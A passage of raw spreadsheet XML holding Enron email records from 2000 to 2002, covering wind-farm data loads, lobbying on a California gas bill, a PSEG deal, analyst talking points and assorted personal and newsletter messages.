_x000D_
Subject: Re: February Mon Files  _x000D_
_x000D_
These look OK. There are several problems with the data, but they do not _x000D_
appear to be upload problems, rather data coverage problems. So these can all _x000D_
be moved to the production side._x000D_
_x000D_
Mark_x000D_
_x000D_
_x000D_
_x000D_
Sunitha Kongara_x000D_
03/07/2002 06:11 PM_x000D_
To: Patricia Hunter/EWC/Enron@ENRON, Mark Fisher/EWC/Enron@Enron, Rabi _x000D_
Sahoo/EWC/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re: February Mon Files  _x000D_
_x000D_
The MON data for MILL RUN,SOMERSET,KLONDIKE has already loaded into _x000D_
development database._x000D_
The data has been loaded for indian mesa 2 for Jan_Feb directory.How ever _x000D_
some turbines have less data because they do not having full month data.The _x000D_
total number of records are 2770._x000D_
_x000D_
The MON files of feb 2002 for MONFORT has been loaded.Total number of records _x000D_
are 558._x000D_
_x000D_
Please look at the data and let me know if any problems are there._x000D_
_x000D_
._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 23 Oct 2001 10:27:17 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Max Movers (713 680 8700) is coming to my house tomorrow at about 8:30 (first pick up of the day) to move the sofa to your house.  I suspect they will be there by 9ish.  Is that ok?_x000D_
</t>
  </si>
  <si>
    <t>Tue, 17 Jul 2001 05:50:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: AB 23XX Bad Bill Alert</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks very much.  I'm assuming that Bev is there in her capacity as lobbyist _x000D_
for Wild Goose on this one?  _x000D_
_x000D_
Can you please let me know 1) the outcome of the meeting and 2) any actions _x000D_
the group intends to take.  I'm here in Sacramento, have alerted Hedy, told _x000D_
her that we're trying to gather more intelligence, and that you and your _x000D_
client are attempting to get folks together to mount opposition.  Give me a _x000D_
call on my cell phone to fill me in on what the group decides.  _x000D_
_x000D_
Finally, what information do you have about where generators and other large _x000D_
customers groups (i.e., CMTA, the Chamber and CLECA) are on the bill?_x000D_
_x000D_
Best,_x000D_
Jeff_x000D_
_x000D_
_x000D_
_x000D_
	MDay &lt;MDay@GMSSR.com&gt;_x000D_
	07/17/2001 12:38 PM_x000D_
		 _x000D_
		 To: "'Jeff.Dasovich@enron.com'" &lt;Jeff.Dasovich@enron.com&gt;, _x000D_
James.D.Steffes@enron.com_x000D_
		 cc: Harry.Kingerski@enron.com, Paul.Kaufman@enron.com, _x000D_
Susan.J.Mara@enron.com, Leslie.Lawner@enron.com, MDay &lt;MDay@GMSSR.com&gt;_x000D_
		 Subject: RE: AB 23XX Bad Bill Alert_x000D_
_x000D_
_x000D_
Jeff;_x000D_
In response to your questions, I cannot explain why everyone missed this_x000D_
bill in the past, I have raised it to the attention of my clients twice in_x000D_
the last two months.  However, now that it is moving they have got the_x000D_
message.  Williams (Kern River) is going to host a meeting today to create a_x000D_
coalition to oppose the bill.  Bev Hansen knows where the meeting will take_x000D_
place.  In addition to Williams, I understand that Questar, WSPA, and other_x000D_
retail customer groups will join the coalition and oppose the bill.  My_x000D_
client Wild Goose will also be listed in opposition, but they don't carry_x000D_
that much clout or name recognition so far.  I am hopeful that other groups_x000D_
will surface soon._x000D_
_x000D_
As for the bill itself, the problem is two fold.  First, the CPUC decides_x000D_
what infrastructure to build at the request of the utilities.  They take_x000D_
input from customers, but Loretta is a command and control type all the way,_x000D_
and she will try to scare away private capital investment by interstate_x000D_
pipelines by mandating that the utilities build a gold-plated_x000D_
state-regulated system.  While the bill does not (and cannot legally) bar_x000D_
interstate pipelines from coming into the state, it has provisions which_x000D_
will prevent large customers from signing up with the interstates.  The_x000D_
large customers have to commit to take firm service on a 5 year basis with_x000D_
exit fees.  If they don't take this, they can only get interruptible service_x000D_
from the utilities.  Many if not all large customers, especially generators_x000D_
cannot afford to take partial service from an interstate and have only_x000D_
interruptible access to the LDC system.  This is the same dilemma that the_x000D_
RLS tariff caused.  My belief is that the obligation on the part of the_x000D_
commission to provide the utilities with cost recovery for the new_x000D_
investments will be used as justification by the utilities for another_x000D_
attempt to reinstitute the RLS tariff or an onerous peaking rate.  The_x000D_
Commission will impose a premium price on service to customers who have not_x000D_
undertaken the firm 5 year commitment and will therefore be unable to_x000D_
economically take partial requirements service from an interstate.  My view_x000D_
is based on Sempra's reaction to the current peaking rate proposed decision_x000D_
and statements by Lynch's office.  This could interfere with Enron gas sales_x000D_
over the interstates, and would certainly threaten any Transwestern plans_x000D_
for building across the border into California, although that does not_x000D_
appear to be a high priority at this time.  This bill will also make it more_x000D_
costly to develop gas supply arrangments for new power plants which had_x000D_
hoped to direct connect to interstate pipeline capacity for a portion of_x000D_
their needs._x000D_
_x000D_
Please call if you have further questions.  Mike Day_x000D_
_x000D_
-----Original Message-----_x000D_
From: Jeff.Dasovich@enron.com [mailto:Jeff.Dasovich@enron.com]_x000D_
Sent: Tuesday, July 17, 2001 10:09 AM_x000D_
To: James.D.Steffes@enron.com_x000D_
Cc: Harry.Kingerski@enron.com; Paul.Kaufman@enron.com;_x000D_
Susan.J.Mara@enron.com; Leslie.Lawner@enron.com; MDay@GMSSR.com_x000D_
Subject: Re: AB 23XX Bad Bill Alert_x000D_
_x000D_
_x000D_
_x000D_
I've taken a quick look at the bill and have attached for easy viewing._x000D_
Few questions._x000D_
_x000D_
Mike,_x000D_
   I understand from our conversation yesterday that your following this on_x000D_
   behalf of Questar.  Do we know if the other pipelines have been active_x000D_
   in any discussions on this bill?_x000D_
   What about the generators?  Have then been involved, since presumably,_x000D_
   their in need of lots more capacity (and they're referenced in the_x000D_
   bill)?_x000D_
   What about large customers?  They been screaming for more_x000D_
   infrastructure, too, and many have blamed SoCalGas (and the PUC) for not_x000D_
   delivering it._x000D_
   Do we know if pipelines, generators, large customers are supporting or_x000D_
   opposing the bill?  I'll try to check around, too, in between the_x000D_
   electric mayhem._x000D_
   There doesn't seem to be anything in the bill that prevents the_x000D_
   interstates from building into the state._x000D_
   If that's true, wouldn't the PUC take those projects into account when_x000D_
   doing its analysis and only require the utility to construct (and_x000D_
   noncore to take) capacity that isn't already being met by others (i.e.,_x000D_
   interstates) bringing pipe into the state?_x000D_
_x000D_
Any info you can provide on these fronts would be very useful.  Don't want_x000D_
Enron too far out in front of opposition until we find out a bit more_x000D_
regarding 1) whose fer and agin it and 2) analysis of what the bill_x000D_
actually does/does not do._x000D_
_x000D_
Thanks again for the heads up._x000D_
_x000D_
Best,_x000D_
Jeff_x000D_
_x000D_
(See attached file: 23XX.pdf)_x000D_
_x000D_
_x000D_
 _x000D_
_x000D_
                    James D_x000D_
_x000D_
                    Steffes              To:     Harry_x000D_
Kingerski/Enron@EnronXGate          _x000D_
                                         cc:     Jeff_x000D_
Dasovich/NA/Enron@Enron, Susan J     _x000D_
                    07/17/2001           Mara/NA/Enron, Paul_x000D_
Kaufman/Enron@EnronXGate      _x000D_
                    07:43 AM             Subject:     AB 23XX Bad Bill Alert_x000D_
_x000D_
 _x000D_
_x000D_
 _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Harry --_x000D_
_x000D_
Can you track down this bill and determine impact?  We'll discuss on_x000D_
Thursday._x000D_
_x000D_
Jim_x000D_
---------------------- Forwarded by James D Steffes/NA/Enron on 07/17/2001_x000D_
07:43 AM ---------------------------_x000D_
_x000D_
_x000D_
MDay &lt;MDay@GMSSR.com&gt; on 07/16/2001 06:03:33 PM_x000D_
_x000D_
To:   "'Bev Hansen, Enron lobbyist'" &lt;bhansen@lhom.com&gt;, "'Hedy Govenar,_x000D_
      Enron Sacto lobbyist'" &lt;hgovenar@govadv.com&gt;, "'Scott Govenar, Enron_x000D_
      lobbyist'" &lt;sgovenar@govadv.com&gt;, "'Harry Kingerski'"_x000D_
      &lt;hkingers@enron.com&gt;, "'Jim Steffes, Enron'" &lt;jsteffe@enron.com&gt;_x000D_
cc:_x000D_
_x000D_
Subject:  AB 23XX   Bad Bill Alert_x000D_
_x000D_
Is AB 23XX moving with a chance of passage?   I just learned that this_x000D_
Pescetti bill that was AB 1425 was revived as a 2X bill.  It is very_x000D_
anti-competitive, and could hurt a number of TW, EES, or ENA gas deals by_x000D_
binding customers to 100% utility service through the imposition of large_x000D_
exit fees by the CPUC.  If there is a chance that it moves, we need to_x000D_
discuss the effect of this bill.  Mike Day_x000D_
_x000D_
_x000D_
http://info.sen.ca.gov/pub/bill/asm/ab_0001-0050/abx2_23_bill_20010625_amend_x000D_
_x000D_
ed_sen.pdf_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 12 Feb 2001 05:54:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'ccampbell@kslaw.com', 'jkeffer@kslaw.com', 'carlos.sole@enron.com'})</t>
  </si>
  <si>
    <t>PSEG Request</t>
  </si>
  <si>
    <t xml:space="preserve">FYI. Note that PSEG wants to sign a binding LOI.  _x000D_
_x000D_
Carlos and I will discuss how to move forward._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 02/12/2001 01:51 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Fred Mitro@ECT_x000D_
02/12/2001 01:48 PM_x000D_
To: Kay Mann/Corp/Enron@Enron_x000D_
cc: Rusty Stevens/Corp/Enron@ENRON, Scott Healy/SF/ECT@ECT, Ben _x000D_
Jacoby/HOU/ECT@ECT _x000D_
_x000D_
Subject: PSEG Request_x000D_
_x000D_
Kay:_x000D_
_x000D_
I talked with PSEG this morning.  PSEG would like to negotiate and sign a _x000D_
binding LOI regarding the Kendall project site in Illinois prior to _x000D_
negotiating and executing the Definitive SPA.  The specifics of this LOI are:_x000D_
_x000D_
 PSEG would pay an up-front $300,000 payment to ENA _x000D_
 This payment would be non-refundable unless PSEG discovered a "fatal flaw" _x000D_
in the project (we will have to carefully define this concept)_x000D_
 The binding LOI would establish a date by which the SPA would be executed or _x000D_
PSEG would forfeit the up-front payment_x000D_
 The $2.7 MM balance of the Purchase Price would be due upon closing (signing _x000D_
the SPA and transferring the member interests)._x000D_
_x000D_
I believe that PSEG is getting nervous that we may close on the Kendall LLC _x000D_
with another Buyer before they get their act together._x000D_
_x000D_
Call me to discuss the timing of drafting such an LOI.  I would like to _x000D_
strike on PSEG while they are anxious and motivated.  My goal is to send the _x000D_
LOI to PSEG by Wednesday of this week.  I can work directly with Carolyn if _x000D_
that is the most efficient approach._x000D_
_x000D_
Fred_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sun, 15 Apr 2001 14:40:51 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'bammelyoungfamilies@listbot.com'})</t>
  </si>
  <si>
    <t>Young Families Egg Hunt</t>
  </si>
  <si>
    <t>BammelYoungFamilies_x000D_
_x000D_
--------------------------- ListBot Sponsor --------------------------_x000D_
Start Your Own FREE Email List at http://www.listbot.com/links/joinlb_x000D_
----------------------------------------------------------------------_x000D_
_x000D_
_x000D_
http://24.27.98.187/Pictures/2001/04-15_YoungFamilies_EggHunt/page00.htm_x000D_
_x000D_
_x000D_
_______________________________________________________________________x000D_
To unsubscribe, write to BammelYoungFamilies-unsubscribe@listbot.com</t>
  </si>
  <si>
    <t>Tue, 15 Jan 2002 11:52:02 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'breakingnews@mail.cnn.com'})</t>
  </si>
  <si>
    <t>frozenset({'textbreakingnews@cnnimail12.cnn.com'})</t>
  </si>
  <si>
    <t>CNN Breaking News</t>
  </si>
  <si>
    <t>-- Taliban American John Walker will be charged with aiding and abetting terrorists, administration sources say._x000D_
Watch CNN or log on to http://CNN.com /AOL Keyword: CNN for the latest news._x000D_
_x000D_
********** Exclusive CNN Video ************************************_x000D_
Watch the day's top stories with CNN's Quickcast. This constantly_x000D_
updated Web exclusive newscast and more CNN video is only available_x000D_
with RealOne. Learn more: http://www.cnn.com/quickcast/bnews_x000D_
*******************************************************************_x000D_
_x000D_
To unsubscribe from CNN.com's Breaking News E-Mail Alert, log on to:_x000D_
http://cnn.com/EMAIL/breakingnews.html, go to http://cnn.com/email to_x000D_
sign up for additional e-mail products_x000D_
_x000D_
(c) 2002 Cable News Network, Inc._x000D_
An AOL Time Warner Company_x000D_
_x000D_
_x000D_
_x000D_
CNN Interactive email id:8390145202264434</t>
  </si>
  <si>
    <t>Wed, 6 Feb 2002 11:40:20 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'nxb@allegrodevelopment.com'})</t>
  </si>
  <si>
    <t>RE: sos</t>
  </si>
  <si>
    <t>nado uznat' , mozhet oni v nazare ili zales mogut mne prosto kamen' v ton k serezhkam vstavit'..... _x000D_
Ne nado mne drugoe kol'tso... :(((((((((((((((((((((((((((_x000D_
_x000D_
-----Original Message-----_x000D_
From: Pimenov, Vladi [mailto:Vladi.Pimenov@ENRON.com]_x000D_
Sent: Wednesday, February 06, 2002 1:17 PM_x000D_
To: Natalie Bondareva_x000D_
Subject: RE: sos_x000D_
_x000D_
_x000D_
LApka, ne rasstraivaisia, eto bivaet. Mi tebe novoe kupim, eshe luche._x000D_
 _x000D_
tvoy liubiashiy zaets_x000D_
_x000D_
-----Original Message-----_x000D_
From: Natalie Bondareva [mailto:nxb@allegrodevelopment.com]_x000D_
Sent: Wednesday, February 06, 2002 10:26 AM_x000D_
To: Pimenov, Vladi_x000D_
Subject: sos_x000D_
_x000D_
_x000D_
(plachet...)_x000D_
 _x000D_
u menya vypal kamushek iz kol'tsa... chto delat'???????? _x000D_
slava bogu - ne brilliant, no tozhe - iz morgo lyubimogo, kotoroe ya vse vremya noshu.... _x000D_
chto delat'????_x000D_
 _x000D_
_x000D_
The information contained in this e-mail message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us immediately by e-mail, and delete the original message.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_x000D_
_x000D_
The information contained in this e-mail message is intended only for the personal and confidential use of the recipient(s) named above. If the reader of this message is not the intended recipient or an agent responsible for delivering it to the intended recipient, you are hereby notified that you have received this document in error and that any review, dissemination, distribution, or copying of this message is strictly prohibited. If you have received this communication in error, please notify us immediately by e-mail, and delete the original message.</t>
  </si>
  <si>
    <t>Sat, 20 Jan 2001 09:48:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mark.palmer@enron.com', 'jeff.dasovich@enron.com', 'steven.kean@enron.com', 'richard.shapiro@enron.com'})</t>
  </si>
  <si>
    <t>Analyst Meeting Talking Points</t>
  </si>
  <si>
    <t xml:space="preserve">Here are some thoughts for Enron to share with at the Analyst meeting.  _x000D_
Please let me know if you have any additions, changes, or deletions.  What I _x000D_
tried to put down were the key facts and positions.  If I've missed anything _x000D_
let me know.  This is not a great story._x000D_
_x000D_
Jim_x000D_
_x000D_
OUR PHYSICAL POSITION IN CALIFORNIA_x000D_
_x000D_
EES has electricity customers within the territories of SCE, PG&amp;E, and SDG&amp;E _x000D_
(about 800 MW of usage) [NOTE - CHECK WITH EES].  EES has natural gas _x000D_
customers within the territories PG&amp;E and SoCal Gas._x000D_
_x000D_
Enron does not have any generation in California (we own a small QF in Nevada _x000D_
but only have 50 MW excess).  _x000D_
_x000D_
We supply power to the Utilities and to our retail load by buying excess in _x000D_
California or by transmitting power into the state.  Enron sells natural gas _x000D_
to the LDCs mainly under spot arrangements._x000D_
_x000D_
Enron continues to manage the risk by using traditional hedging tools and by _x000D_
using the full complement of resources of EES - demand reduction, load _x000D_
shaping, and efficiency improvements._x000D_
_x000D_
Transwestern has long-term capacity arrangements with PG&amp;E._x000D_
_x000D_
OUR POLITICAL POSITION IN CALIFORNIA / MESSAGES_x000D_
_x000D_
The current situation (shortages and potential bankruptcy) is not the result _x000D_
of competitive markets, rather it is the result of barriers to workable _x000D_
retail and wholesale markets designed into the California deregulation model _x000D_
(for instance, the overreliance of the Utilities on the spot market, the _x000D_
residual CTC calculation, incomplete retail tariff unbundling requiring _x000D_
direct access customers to pay more than their fair share for the Utilities' _x000D_
common costs). _x000D_
_x000D_
Enron does not want to see the California Utilities go bankrupt because those _x000D_
naysayers of competition will use this situation as an argument against _x000D_
competition.  Enron disagrees.  What it proves is that not finishing the job _x000D_
of creating real competition can result in problems.  _x000D_
_x000D_
Enron believes that there are workable short-term and long-term solutions for _x000D_
California._x000D_
_x000D_
In the short-term, (1) California must provide credit enhancement or directly _x000D_
buy power for the Utilities' needs to ensure a stable supply of electricity, _x000D_
(2) California should incent customers to institute demand reductions, and _x000D_
(3) California should raise rates to cover reasonable costs so that the _x000D_
Utilities do not petition for bankruptcy._x000D_
_x000D_
In the long-term, (1) California needs to continue its activities to promote _x000D_
retail competition (and most importantly it must allow real price signals to _x000D_
be sent to large customers), (2) California should implement the changes that _x000D_
the FERC highlighted (end the reliance on the spot market, remove _x000D_
stakeholders on the Cal ISO Board, give the Utilties the ability to recover _x000D_
wholesale power costs), (3) California must remove unnecessary barriers to _x000D_
the development of additional generation capacity, and, most importantly, (4) _x000D_
California must establish reasonable structures so that the Utilities develop _x000D_
a balanced portfolio of supplies to better manage electricity market _x000D_
volatility._x000D_
_x000D_
California should not get into the business of owning or operating generation _x000D_
assets or transmission facilities.  _x000D_
_x000D_
California should not stop moving forward with retail competitition which _x000D_
allows customers to manage price risk rather than some regulator._x000D_
_x000D_
KEY ENRON ISSUES IN CALIFORNIA_x000D_
_x000D_
We do have outstanding deliveries into the California utilities and would be _x000D_
an unsecured creditor if bankruptcy occurs. We continue to sell to _x000D_
creditworthy counterparties in Western Power markets. [NOTE - THE AMOUNT OF _x000D_
RISK IS AN IR ISSUE THEY WANT TO MANAGE]._x000D_
_x000D_
The PX Credit (and associated negative CTC) continues to be an issue.  Enron _x000D_
believes that the rate freeze has not yet ended legally and PG&amp;E's and SCE's _x000D_
tariff requires the Utilities to pay funds to the customer's agent.  We filed _x000D_
a Complaint Friday January 19 at the CPUC.  We are confident that these funds _x000D_
will be recovered.  [NOTE - I DON'T THINK WE WANT TO HIGHLIGHT THIS - AGAIN _x000D_
AN IR ISSUE BECAUSE OF THE RECEIVABLE]_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 30 Apr 2001 03:30:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Review game plan for elimination of confirmations and impact on_x000D_
 CommodityLogic (follow-up to Sally Beck meeting)</t>
  </si>
  <si>
    <t>Invitees:  Sally Beck, Andy Zipper, Jay Webb, Tom Gross, Jeff Hodge, _x000D_
Elizabeth Sager, Leslie Reeves, MET_x000D_
(Patti x39106)</t>
  </si>
  <si>
    <t>Mon, 11 Dec 2000 17:34:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'etrade@esurvey.0mm.com'})</t>
  </si>
  <si>
    <t>Reminder -- Tell Us What Interests You</t>
  </si>
  <si>
    <t xml:space="preserve">Dear E*TRADE Customer,_x000D_
_x000D_
We recently sent you an invitation to tell us about your investment_x000D_
needs._x000D_
_x000D_
Please take a moment to tell us about the products and services you're_x000D_
most interested in.  We'll use your input to deliver resources that_x000D_
best support your short and long-term financial needs._x000D_
_x000D_
Just click on the link below and you'll be on your way.  The profile_x000D_
is brief (about ten questions) and should take less than five minutes_x000D_
to complete._x000D_
_x000D_
http://www.esurvey.com/etrade/us/dec00/survey.rti?5081767_x000D_
_x000D_
We appreciate your interest in E*TRADE and hope to continue to provide_x000D_
you with the tools that you need for managing and growing your money._x000D_
We look forward to providing you with the products and services that_x000D_
matter most to you._x000D_
_x000D_
Sincerely,_x000D_
Connie Dotson_x000D_
Chief Service Quality Officer_x000D_
E*TRADE Securities, Inc._x000D_
_x000D_
Copyright 2000 E*TRADE Securities, Inc. Member NASD/SIPC. All rights_x000D_
reserved._x000D_
_x000D_
System response and account access times may vary due to a variety of_x000D_
factors, including trading volumes, market conditions, system_x000D_
performance, and other factors._x000D_
_x000D_
HOW TO UNSUBSCRIBE:_x000D_
_x000D_
You received this e-mail because you registered on the E*TRADE Web_x000D_
site, or on one of our partners' sites. If you do not want to receive_x000D_
partner e-mail offers, or any E*TRADE marketing e-mail, you can change_x000D_
your preferences now at:_x000D_
_x000D_
http://www.0mm.com/cg/etrade/unsub.cgi?e=sscott3@enron.com_x000D_
_x000D_
You are subscribed at: sscott3@enron.com  E*TRADE takes your_x000D_
privacy seriously. To learn more about E*TRADE's use of personal_x000D_
information, please read our Privacy Policy at:_x000D_
http://www.etrade.com/cgi-bin/gx.cgi/AppLogic+Home?gxml=hpa_privacy.html_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 5 Jan 2001 04:58:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: MISSING DEAL?</t>
  </si>
  <si>
    <t xml:space="preserve">This was Mike Swerzbin's deal, and I guess he missed it yesterday. We just _x000D_
entered it and backdated it for 1/4/01. Deal # is 490867._x000D_
_x000D_
thanks,_x000D_
Kate_x000D_
_x000D_
_x000D_
Stephanie Piwetz   01/05/2001 12:12 PM_x000D_
_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: MISSING DEAL?_x000D_
_x000D_
Hello Kate-_x000D_
El paso just called to verbal some deals and he had one that we did not have:_x000D_
trade date 1/4/01_x000D_
_x000D_
Enron Sells El Paso_x000D_
Q2   2001_x000D_
off peak  25mws_x000D_
$175.00_x000D_
Mid C_x000D_
thru Natsource_x000D_
_x000D_
Please check to see if good trade, did not give me trader name, Natsource did _x000D_
not tell me of this trade last night in checkout.  Thanks _x000D_
Stephanie_x000D_
7138539210_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 29 Nov 2000 07:32:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: trip</t>
  </si>
  <si>
    <t>LOVE YA!!!!!!!!!!!!!!_x000D_
_x000D_
&gt;From: Mark.Guzman@enron.com_x000D_
&gt;To: kimberly_kirkwood@hotmail.com_x000D_
&gt;Subject: Re: trip_x000D_
&gt;Date: Wed, 29 Nov 2000 12:43:19 -0800_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;Kim, who do you think you are fooling?  A drink or two?  Really?!?!  I_x000D_
&gt;think I have heard that one from you before.  I don't even say shit like_x000D_
&gt;that anymore because when I say shit like that I end up partying harder_x000D_
&gt;than I would have had I just kept my mouth shut.  But in respect for your_x000D_
&gt;new job we will make sure you are home and tucked in bed early!  :)  See ya_x000D_
&gt;soon!_x000D_
&gt;_x000D_
_x000D_
_______________________________________________________________________________x000D_
________x000D_
Get more from the Web.  FREE MSN Explorer download : http://explorer.msn.com</t>
  </si>
  <si>
    <t>Tue, 27 Mar 2001 00:59:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'natalie.wells@enron.com'})</t>
  </si>
  <si>
    <t>Re: Earth Day Tickets</t>
  </si>
  <si>
    <t xml:space="preserve">My location is EB 3211D._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Eric_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Natalie Wells@ENRON_x000D_
03/27/2001 07:59 AM_x000D_
To: Eric Bass/HOU/ECT@ECT, Patrick Scales/NA/Enron_x000D_
cc:  _x000D_
Subject: Earth Day Tickets_x000D_
_x000D_
For hand delivery of your tickets, please provide an Enron location. _x000D_
If you prefer, we can Fed Ex your tickets to your home. There is an _x000D_
additional charge for this service._x000D_
Thanks,_x000D_
Natalie_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 25 Jul 2000 11:03:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'bill.greenizan@enron.com'})</t>
  </si>
  <si>
    <t>Re: AB Demand break-down</t>
  </si>
  <si>
    <t>What type of industrial.  ie Chemical, Fertilizer etc.</t>
  </si>
  <si>
    <t>Thu, 12 Apr 2001 11:34:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'elaine.overturf@enron.com'})</t>
  </si>
  <si>
    <t>Form 4 Reminder for March</t>
  </si>
  <si>
    <t>I didn't sell any, right?_x000D_
---------------------- Forwarded by Steven J Kean/NA/Enron on 04/12/2001 _x000D_
06:33 PM ---------------------------_x000D_
From: Rebecca Carter on 03/21/2001 03:38 PM_x000D_
Sent by: Kelly Johnson_x000D_
To: Kenneth Lay/Corp/Enron@ENRON, Jeff Skilling/Corp/Enron@ENRON, Ken _x000D_
Harrison/ENRON@enronxgate, Cliff Baxter/Enron@EnronXGate, Mark _x000D_
Frevert/Enron@EnronXGate, Stanley Horton/Corp/Enron@Enron, Ken Rice/Enron _x000D_
Communications@Enron Communications, Karen S Owens@ees@EES, Rick _x000D_
Buy/Enron@EnronXGate, Richard Causey/Corp/Enron@ENRON, James _x000D_
Derrick/Enron@EnronXGate, Andrew S Fastow/Enron@EnronXGate, Steven J _x000D_
Kean/NA/Enron@Enron, Mark Koenig/Corp/Enron@ENRON, Mark _x000D_
Metts/Enron@EnronXGate, Cindy Olson/Corp/Enron@ENRON_x000D_
cc: Rosalee Fleming/Corp/Enron@ENRON, Sherri Sera/Corp/Enron@ENRON, Dolly _x000D_
Henrici/ENRON@enronxgate, Susan Skarness/Enron@EnronXGate, Nicki _x000D_
Daw/Enron@EnronXGate, Cindy Stark/Corp/Enron@ENRON, Dorothy Dalton/Enron _x000D_
Communications@Enron Communications, Karen Owens/HOU/EES@EES, Karen K _x000D_
Heathman/Enron@EnronXGate, Sharron Westbrook/Corp/Enron@ENRON, Stephanie _x000D_
Harris/Enron@EnronXGate, Bridget Maronge/Enron@EnronXGate, Maureen _x000D_
McVicker/NA/Enron@Enron, Joannie Williamson/Corp/Enron@ENRON, Dolores _x000D_
Fisher/Enron@EnronXGate, Kathy McMahon/NA/Enron@Enron _x000D_
_x000D_
Subject: Form 4 Reminder for March _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
CONFIDENTIALITY NOTICE_x000D_
_x000D_
The information contained in this email may be confidential and/or _x000D_
privileged. This email is intended to be reviewed by the individual or _x000D_
organization named above. If you are not the intended recipient, you are _x000D_
hereby notified that any review, dissemination or copying of this email or _x000D_
its attachments, if any, or the information contained herein is prohibited. _x000D_
If you have received this email in error, please immediately notify the _x000D_
sender by return email and delete this email from your system. Thank you.</t>
  </si>
  <si>
    <t>Mon, 22 May 2000 08:23:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>New ISDA: Kinder Morgan, Inc.</t>
  </si>
  <si>
    <t>hey there,_x000D_
_x000D_
Could someone please prepare a draft ISDA and overnight a copy to this _x000D_
customer._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Thanks_x000D_
Brant</t>
  </si>
  <si>
    <t>Thu, 19 Apr 2001 12:30:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'amelia.alder@enron.com'})</t>
  </si>
  <si>
    <t>LET'S DO LUNCH IN BELLVILLE</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Be sure to stop at the Enron stake-out in Bellville for our specially catered lunch.  _x000D_
_x000D_
Sarita Garza and her crack team of volunteers will be there at dawn to save a spot.    They will hand out a special surprise to celebrate your arrival at the mid-point of the first day's journey._x000D_
_x000D_
When you pull off the highway into the Bellville Park, watch for the Enron signs to direct you to our picnic area. _x000D_
_x000D_
 Happy Pedaling!   Amelia     _x000D_
       __o_x000D_
     _`\&lt;,__x000D_
    (*)/ (*)        _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 9 Feb 2001 01:11:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'stacey.richardson@enron.com', 'lstevens@wt.net', 'tiffany@eubanks-architects.com', 'amber.ebow@enron.com', 'michelle.laurant@enron.com', 'adrial.boals@enron.com', 'beckybeltran@hotmail.com', 'bernice.rodriguez@enron.com', 'judy.hernandez@enron.com'})</t>
  </si>
  <si>
    <t>Too Precious!!!! [Attachments have been scanned for viruses.]</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Julissa Marron/Corp/Enron on 02/09/2001 _x000D_
09:09 AM ---------------------------_x000D_
_x000D_
_x000D_
Stacie Guidry_x000D_
02/09/2001 08:47 AM_x000D_
To: John Howard Harrison/HOU/ECT@ECT, tdross@pdq.net, rlsimon51972@aol.com, _x000D_
ckidder@bellsouth.net_x000D_
cc: Julissa Marron/Corp/Enron@ENRON _x000D_
_x000D_
Subject: Too Precious!!!! [Attachments have been scanned for viruses.]_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Stacie Guidry/NA/Enron on 02/09/2001 _x000D_
08:45 AM ---------------------------_x000D_
_x000D_
_x000D_
	Amanda Talbot @ EES_x000D_
	02/09/2001 08:12 AM_x000D_
	_x000D_
To: Jennifer Sepeda/HOU/EES@EES, Stacie Guidry/NA/Enron@Enron, Ruby _x000D_
Kyser/NA/Enron@Enron, Georgia Matula/HOU/EES@EES, Christie Manck/HOU/EES@EES, _x000D_
Anna Bailey/HOU/EES@EES, Kathy Armstrong/HOU/EES@EES, Felisa _x000D_
Lewis/HOU/EES@EES, Libby Lakhdari/HOU/EES@EES, Maxine Woodard/HOU/EES@EES, _x000D_
Chastity Estes/HOU/EES@EES, Niki Davis/ECF/Enron@ENRON, Beverly _x000D_
Stephens/Corp/Enron@Enron, Laura Bacon/Enron@EnronXGate, _x000D_
bathtubgin311@hotmail.com, patsytalbot@mailcity.com, pammy912@aol.com, _x000D_
alt0975@swbell.net_x000D_
cc:  _x000D_
_x000D_
Subject: Too Precious!!!! [Attachments have been scanned for viruses.]_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Amanda Talbot/HOU/EES on 02/09/2001 08:09 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Copier Repair@ECT_x000D_
02/09/2001 08:07 AM_x000D_
